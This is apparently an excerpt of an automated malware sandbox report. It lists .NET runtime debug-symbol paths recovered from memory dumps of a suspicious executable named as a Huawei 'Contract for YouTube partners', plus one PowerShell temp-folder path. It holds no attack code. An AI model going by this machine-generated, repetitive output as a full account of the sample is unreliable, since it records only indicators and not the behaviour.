Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdbhP source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdb source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256Y$ source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.Windows.Core/Release/net8.0/System.Private.Windows.Core.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256}yx source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256b' source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256M source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
